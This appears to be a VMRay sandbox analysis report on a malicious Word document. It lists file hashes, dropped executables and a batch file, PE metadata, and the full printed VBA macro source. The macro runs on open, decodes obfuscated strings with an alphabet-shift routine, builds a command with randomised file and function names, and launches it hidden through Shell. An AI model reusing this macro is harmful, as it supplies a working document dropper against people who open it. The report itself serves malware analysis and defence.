Word Doc. Drops Context Aware Payload | Files
Try VMRay Analyzer
File Information
Sample files count 1
Created files count 6
Modified files count 0
c:\users\adu0vk iwa5kls\desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc
-
File Properties
Names c:\users\adu0vk iwa5kls\desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc (Sample File)
Size 99.50 KB (101888 bytes)
Hash Values MD5: 8c16de37cccc9788384adb61c118ba2c
SHA1: c54b16bd6a507bbbb832c4c62b894f426acecf31
SHA256: 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca
Actions
VBA Information
+
VBA Properties
Module Count 7
Macro Count 10
ThisDocument.cls - Activate Workbook
+ 
Sub autoopen()
myfunc1
End Sub
Module1.bas - Eventless
+ 
Function generateFuncName()
Randomize
countSymbols = CInt(Int((9 * Rnd()) + 4))
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gName = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol1) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.middleSymbol1, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFuncName = gName
End Function
           
Function generateArgName()
Randomize
countSymbols = CInt(Int((9 * Rnd()) + 4))
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gName = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol1) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.middleSymbol1, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateArgName = gName
End Function
Module2.bas - Eventless
+ 
Function createTextString(str)
myform1.TextBox2 = str
End Function
Module3.bas - Eventless
+ 
Function getCharReverse(b As String, key As Integer) As String
Dim num As Integer
num = 0
Count = Len(myform1.alphabet)
For i = 1 To Count
If (Mid(myform1.alphabet, i, 1) = b) Then
    num = i
    Exit For
End If
Next i
num = IIf(num - key <= 0, Len(myform1.alphabet) + num - key, num - key)
getCharReverse = Mid(myform1.alphabet, num, 1)
End Function

Function decode(code)
dec = ""
Count = Len(code)
For i = 1 To Count
dec = dec + getCharReverse(Mid(code, i, 1), myform1.key)
Next i
decode = dec
End Function
Module4.bas - Eventless
+ 
Function generateFileName1()
Randomize
countSymbols = CInt(Int((9 * Rnd()) + 4))
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gn = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol2) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.middleSymbol2, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFileName1 = gn
End Function

Function generateFileName2()
Randomize
countSymbols = CInt(Int((9 * Rnd()) + 4))
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gn = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol2) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.middleSymbol2, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFileName2 = gn
End Function
myform1.frm - Eventless
+ 
Private Sub TextBox1_Change()
enc2 = "2dHoi]/lfq*"
enc4 = "Wrr(O!S(4"
enc5 = "Eunurr3vHogiowSiamuhhqrr(O!S(4"
enc6 = "EunurrvFoipD"
enc7 = "2rr;oosCRRyyyEu,u/oh8[EmbRxgh67Es/lrr3Fmgom;D"
enc8 = "2rr;oosCRRoiulgio;gwj]//]uEmaE[xRxgh67Es/lrr3FrVVqeqA[owK]cuqwu/maj]/lqGHM}}qwK]cuSgo;q(O!S(4"

fn = generateFuncName
argName = generateArgName
fn1 = generateFileName1
fn2 = generateFileName2

createTextString (decode(UserForm1.enc1) + fn + decode(enc2) + argName + decode(UserForm1.enc3) + argName + decode(enc4) + fn1 + decode(enc5) + fn1 + decode(enc6) + fn + decode(enc7) + fn + decode(enc8) + fn2 + decode(UserForm1.enc9) + fn2 + decode(myform1.enc10))

Shell myform1.TextBox2, 0
End Sub
NewMacros.bas - Eventless
+ 
Sub myfunc1()
myform1.TextBox1 = "111"
End Sub
c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat
-
File Properties
Names c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat (Created File)
Size 0.32 KB (332 bytes)
Hash Values MD5: 6b02cf51939341cf79053976790bdae0
SHA1: 7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed
SHA256: 845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252
Actions
c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe, ...
-
File Properties
Names c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe (Created File)
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe (Created File)
Size 472.00 KB (483328 bytes)
Hash Values MD5: 0ebfd6e45dea48c7f54b5574d69da458
SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b
SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x411737
Size Of Code 0x2e000
Size Of Initialized Data 0x47000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2016-10-27 14:41:08
Compiler/Packer Armadillo v1.71
Sections (4)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2d6ec 0x2e000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.65
.rdata 0x42f000 0xdfa6 0xe000 0x2f000 CNT_INITIALIZED_DATA, MEM_READ 6.13
.data 0x43d000 0x95ac 0xa000 0x3d000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 5.81
.rsrc 0x447000 0x2ef70 0x2f000 0x47000 CNT_INITIALIZED_DATA, MEM_READ 6.94
Imports (68)
+
USER32.dll (36)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
TranslateMessage 0x0 0x42f090 0x3cab4 0x3cab4
DispatchMessageW 0x0 0x42f094 0x3cab8 0x3cab8
LoadCursorW 0x0 0x42f098 0x3cabc 0x3cabc
RegisterClassExW 0x0 0x42f09c 0x3cac0 0x3cac0
BeginPaint 0x0 0x42f0a0 0x3cac4 0x3cac4
GetWindowRect 0x0 0x42f0a4 0x3cac8 0x3cac8
MoveWindow 0x0 0x42f0a8 0x3cacc 0x3cacc
PostQuitMessage 0x0 0x42f0ac 0x3cad0 0x3cad0
MessageBoxW 0x0 0x42f0b0 0x3cad4 0x3cad4
DefWindowProcW 0x0 0x42f0b4 0x3cad8 0x3cad8
DestroyWindow 0x0 0x42f0b8 0x3cadc 0x3cadc
SendMessageW 0x0 0x42f0bc 0x3cae0 0x3cae0
LoadStringW 0x0 0x42f0c0 0x3cae4 0x3cae4
CreateWindowExW 0x0 0x42f0c4 0x3cae8 0x3cae8
DestroyCursor 0x0 0x42f0c8 0x3caec 0x3caec
GetDlgItemInt 0x0 0x42f0cc 0x3caf0 0x3caf0
LoadAcceleratorsW 0x0 0x42f0d0 0x3caf4 0x3caf4
EndPaint 0x0 0x42f0d4 0x3caf8 0x3caf8
GetMessageW 0x0 0x42f0d8 0x3cafc 0x3cafc
SetMenuItemInfoW 0x0 0x42f0dc 0x3cb00 0x3cb00
GetClassNameW 0x0 0x42f0e0 0x3cb04 0x3cb04
SetMenu 0x0 0x42f0e4 0x3cb08 0x3cb08
PtInRect 0x0 0x42f0e8 0x3cb0c 0x3cb0c
InflateRect 0x0 0x42f0ec 0x3cb10 0x3cb10
DrawIcon 0x0 0x42f0f0 0x3cb14 0x3cb14
InsertMenuItemW 0x0 0x42f0f4 0x3cb18 0x3cb18
GetDesktopWindow 0x0 0x42f0f8 0x3cb1c 0x3cb1c
GetDCEx 0x0 0x42f0fc 0x3cb20 0x3cb20
SetScrollRange 0x0 0x42f100 0x3cb24 0x3cb24
GetActiveWindow 0x0 0x42f104 0x3cb28 0x3cb28
GetDlgItemTextW 0x0 0x42f108 0x3cb2c 0x3cb2c
RedrawWindow 0x0 0x42f10c 0x3cb30 0x3cb30
InsertMenuW 0x0 0x42f110 0x3cb34 0x3cb34
GetDlgCtrlID 0x0 0x42f114 0x3cb38 0x3cb38
GetFocus 0x0 0x42f118 0x3cb3c 0x3cb3c
GetScrollRange 0x0 0x42f11c 0x3cb40 0x3cb40
KERNEL32.dll (15)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
WriteFile 0x0 0x42f008 0x3ca2c 0x3ca2c
lstrlenA 0x0 0x42f00c 0x3ca30 0x3ca30
lstrcmpA 0x0 0x42f010 0x3ca34 0x3ca34
CloseHandle 0x0 0x42f014 0x3ca38 0x3ca38
GetFileSize 0x0 0x42f018 0x3ca3c 0x3ca3c
GetModuleHandleW 0x0 0x42f01c 0x3ca40 0x3ca40
GetStartupInfoA 0x0 0x42f020 0x3ca44 0x3ca44
GetLastError 0x0 0x42f024 0x3ca48 0x3ca48
GetModuleHandleA 0x0 0x42f028 0x3ca4c 0x3ca4c
GetCurrentDirectoryW 0x0 0x42f02c 0x3ca50 0x3ca50
lstrlenW 0x0 0x42f030 0x3ca54 0x3ca54
GetCommandLineW 0x0 0x42f034 0x3ca58 0x3ca58
lstrcpyW 0x0 0x42f038 0x3ca5c 0x3ca5c
CreateFileMappingW 0x0 0x42f03c 0x3ca60 0x3ca60
CreateFileW 0x0 0x42f040 0x3ca64 0x3ca64
GDI32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
TextOutW 0x0 0x42f000 0x3ca24 0x3ca24
SHELL32.dll (2)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
ExtractIconW 0x0 0x42f084 0x3caa8 0x3caa8
CommandLineToArgvW 0x0 0x42f088 0x3caac 0x3caac
MSVCRT.dll (14)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
_exit 0x0 0x42f048 0x3ca6c 0x3ca6c
_XcptFilter 0x0 0x42f04c 0x3ca70 0x3ca70
exit 0x0 0x42f050 0x3ca74 0x3ca74
_acmdln 0x0 0x42f054 0x3ca78 0x3ca78
__getmainargs 0x0 0x42f058 0x3ca7c 0x3ca7c
_initterm 0x0 0x42f05c 0x3ca80 0x3ca80
__setusermatherr 0x0 0x42f060 0x3ca84 0x3ca84
_adjust_fdiv 0x0 0x42f064 0x3ca88 0x3ca88
__p__commode 0x0 0x42f068 0x3ca8c 0x3ca8c
__p__fmode 0x0 0x42f06c 0x3ca90 0x3ca90
__set_app_type 0x0 0x42f070 0x3ca94 0x3ca94
_except_handler3 0x0 0x42f074 0x3ca98 0x3ca98
_controlfp 0x0 0x42f078 0x3ca9c 0x3ca9c
memset 0x0 0x42f07c 0x3caa0 0x3caa0
Icons (1)
+
Icon
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe
-
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id
-
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id (Created File)
Size 0.10 KB (106 bytes)
Hash Values MD5: c9e2607b0faa2a1d36e4ebc553f41698
SHA1: b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821
SHA256: fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e
Actions
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag
-
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag (Created File)
Size 0.01 KB (12 bytes)
Hash Values MD5: 20d4581a76fac9a75b1300485c2c2ce4
SHA1: 56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6
SHA256: 60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d
Actions
c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp
-
File Properties
Names c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp (Created File)
Size 0.50 KB (512 bytes)
Hash Values MD5: bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image